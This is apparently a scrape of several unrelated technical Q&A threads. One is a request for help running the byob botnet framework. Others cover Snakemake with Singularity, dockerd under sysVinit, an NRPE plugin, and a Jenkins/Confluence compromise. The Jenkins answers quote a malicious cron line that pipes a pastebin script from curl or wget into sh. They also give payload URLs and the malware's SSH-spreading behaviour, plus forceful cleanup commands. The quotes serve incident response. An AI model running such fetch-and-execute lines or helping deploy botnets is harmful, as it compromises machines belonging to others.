(I have seen other solutions to "Errno 48" issues on StackOverflow, but none have been successful yet.)
I am trying to develop a botnet using byob on github here: https://github.com/malwaredllc/byob
I am encountering a address in use error every time I run the command sudo ./startup.sh. It returns OSError: [Errno 48] Address already in use.
However when I attempt to use the ps -fA | grep python and kill the associated 502 18126 16973 0 9:16PM ttys000 0:00.00 grep python by using kill -9 181216, I get this error: kill: kill 18126 failed: no such process.
Does anyone have any idea what to do?
I am using a "MacOS M1Pro Chip OS V12.0.1 Monterey". Also the program byob is trying to run on port 5000 of IPv4 127.0.0.1 (this is a generic IP not specifically mine). http://127.0.0.1/5000.
In case you try to duplicate the problem you need to install docker.io or the docker desktop app depending on os then navigate to cd <outer-dir>/byob-master/web-gui then execute sudo ./startup.sh. The code will not work without access to docker, and the program needs to be ran with admin perms using the prefix sudo. The actual downloads take a while and it will prompt you to restart once. Then when you run it again, I encounter this problem...
Please let me know if someone was able to fix this. Thanks!
I'm trying to tie scripts from an existing pipeline on docker into my snakemake pipeline. I have the docker pipeline set up using singularity and it works. For instance,
singularity exec docker://mypipeline some_command.sh file.bam out_file.bam
works perfectly when I run it interactively on the command line. Similarly, when I incorporate the exact same command into my Snakefile it also works:
rule myrule:
input:
"file.bam"
output:
"out_file.bam"
shell:
"singularity exec docker://mypipeline some_command.sh {input} {output}"
However, when I try to follow this tutorial https://reproducibility.sschmeier.com/container/index.html#using-a-container-in-our-workflow to incorporate the container into my workflow as follows
singularity: "docker://mypipeline"
rule myrule:
input:
"file.bam"
output:
"out_file.bam"
shell:
"some_command.sh {input} {output}"
And I run snakemake -p --use-singularity --cores 1 I get the following output
Building DAG of jobs...
Using shell: /bin/bash
Provided cores: 1 (use --cores to define parallelism)
Rules claiming more threads will be scaled down.
Job counts:
count jobs
1 myrule
1
[Sun May 17 15:28:11 2020]
rule myrule:
input: file.bam
output: out_file.bam
jobid: 0
some_command.sh file.bam out_file.bam
Activating singularity image myImage.simg
Then I get a very long report that I'm not sure what to make of, followed by this error message
Waiting at most 5 seconds for missing files.
MissingOutputException in line 3 of Snakefile:
Job completed successfully, but some output files are missing. Missing files after 5 seconds:
out_file.bam
This might be due to filesystem latency. If that is the case, consider to increase the wait time with --latency-wait.
Shutting down, this might take some time.
Exiting because a job execution failed. Look above for error message
Complete log: .snakemake/log/2020-05-17T152810.484310.snakemake.log
My questions:
Why does one work and not the other/how can I get the last example to work?
Is it good practice to declare singularity: "docker://... upfront or does it not matter?
Error message suggests singularity command got executed successfully but snakemake doesn't see the output file. Is the output file out_file.bam shown in your code same as the one you actually use, or you removed some filepath? I would suggest adding --verbose flag to snakemake and reviewing the actual singularity command that snakemake executes.
So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.
at the moment I work with ARM64 based Debian Images and docker.
I want to automate the docker daemon on boot so we do not have to start it manually. But the Images do not use the systemd but good old sysVinit.
So I though "quite easy - simple an init script with command "dockerd" (or start-stop-daemon and dockerd as Argument". But no - does not work. The command "dockerd -v" works fine when booting (checked by pipe output to log file). But when execute "dockerd" without an Argument - so simple start daemon - nothing happen - no error no warning nothing is piped to log file.
So my question is - are there any other processes Need to be started or configurations need to be done before this dockerd command can be started?
When boot is finished and i do SSH to device and manually do "dockerd" all works fine.
just for close this question by myself :D
I noticed that in sysVinit system when starting the init-scripts the path variable did not exist (maybe because root starting the processes). #
So in my script i just added the path variable and set path to folder of dockerd and everything worked well! :D
I'm using Icinga to monitor some servers and services. Most of them run fine. But now I like to monitor a JBoss-AS on one server via NRPE. Therefore I'm using the check_jboss-Plugin from MonitoringExchange. Although each time I try running a test-command from my Icinga-Server via NRPE I'm getting a NRPE: unable to read output error. When I try executing the command directly on the monitored server it runs fine. It's strange that the execution on the monitored server takes around 5 seconds to return a acceptable result but the NRPE-Exceution returns immediately the error. Trying to set up the NRPE-timeout didn't solve the problem. I also checked the permissions of the check_jboss-plugin and set them to "777" so that there should be no error.
I don't think that there's a common issue with NRPE, because there are also some other checks (e.g. check_load, check_disk, ...) via NRPE and they are all running fine. The permissions of these plugins are analog to my check_jboss-Plugin.
Following one sample exceuction on the monitored server which runs fine:
/usr/lib64/nagios/plugins/check_jboss.pl -T ServerInfo -J jboss.system -a MaxMemory -w 3000: -c 2000: -f
JBOSS OK - MaxMemory is 4049076224 | MaxMemory=4049076224
Here are two command-executions via NRPE from my Icinga-Server. Both commands are correctly
./check_nrpe -H xxx.xxx.xxx.xxx -c check_hda1
DISK OK - free space: / 47452 MB (76% inode=97%);| /=14505MB;52218;58745;0;65273
./check_nrpe -H xxx.xxx.xxx.xxx -c jboss_MaxMemory
NRPE: Unable to read output
Does anyone have a hint for me? If further config-information needed please ask :)
Try to rule out SELinux either by disabling it globally or by changing the SELinux type to nagios_unconfined_plugin_exec_t.